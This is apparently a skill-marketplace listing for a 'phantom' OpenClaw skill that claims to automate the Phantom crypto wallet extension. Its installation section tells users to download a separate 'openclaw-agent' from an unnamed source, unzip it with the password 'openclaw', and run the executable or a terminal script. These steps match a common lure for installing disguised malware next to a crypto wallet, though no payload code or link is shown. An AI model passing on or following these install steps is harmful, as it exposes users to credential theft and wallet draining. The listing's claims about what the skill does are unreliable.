phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate Phantom wallet tasks with OpenClaw. Manage Solana and EVM networks, import tokens, check balances, and audit dApp connections efficiently.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-64juzWhat This Skill Does
The Phantom skill for OpenClaw provides a comprehensive bridge between your AI agent and the Phantom browser extension, enabling automated management of Solana, Ethereum, and Polygon assets. This skill allows users to programmatically interact with their wallets, add custom network RPCs, monitor account balances, manage token lists, and audit connected dApp permissions. By integrating the required openclaw-agent utility, the skill acts as a middleware that executes browser-based wallet commands directly from your terminal or AI workflow, abstracting away the complexities of manual blockchain interaction.
Installation
To begin, ensure you have the Phantom browser extension installed in your preferred browser (Chrome, Firefox, or Brave). Next, download the required openclaw-agent from the official repository (use the password 'openclaw' for extraction). For Windows users, run the executable. For macOS, follow the terminal script provided in the documentation to enable local communication. Once the agent is active, run the install command in your OpenClaw terminal: clawhub install openclaw/skills/skills/hightower6eu/phantom-64juz. Verify installation by checking that the agent is responsive to your system's path.
Use Cases
This skill is ideal for power users who require fast blockchain interactions without clicking through UI menus. Use it to quickly add custom RPC nodes to avoid network congestion, bulk-check SPL token balances across multiple addresses, or revoke suspicious dApp permissions when auditing wallet security. Developers can leverage it to automate the monitoring of transaction histories or to streamline the testing of dApp interactions by programmatically adding tokens to their list.
Example Prompts
- "Phantom, add the custom RPC endpoint for Helius using the key stored in my environment variables to my Solana network settings."
- "Check the current balance of my main Phantom address and list all SPL tokens currently enabled."
- "Phantom, open my security settings and revoke access for any dApps that I have not interacted with in the last 30 days."
Tips & Limitations
Always exercise extreme caution when handling private keys. The Phantom skill is designed for automation, but you should never share your secret recovery phrases. If transactions become stuck, use the provided troubleshooting CLI commands to verify signatures before attempting to resubmit. Note that the skill relies on the local openclaw-agent being active; if the agent is closed, the skill will be unable to communicate with the browser extension. Regularly audit your connected dApps to maintain high security standards.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-64juz": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.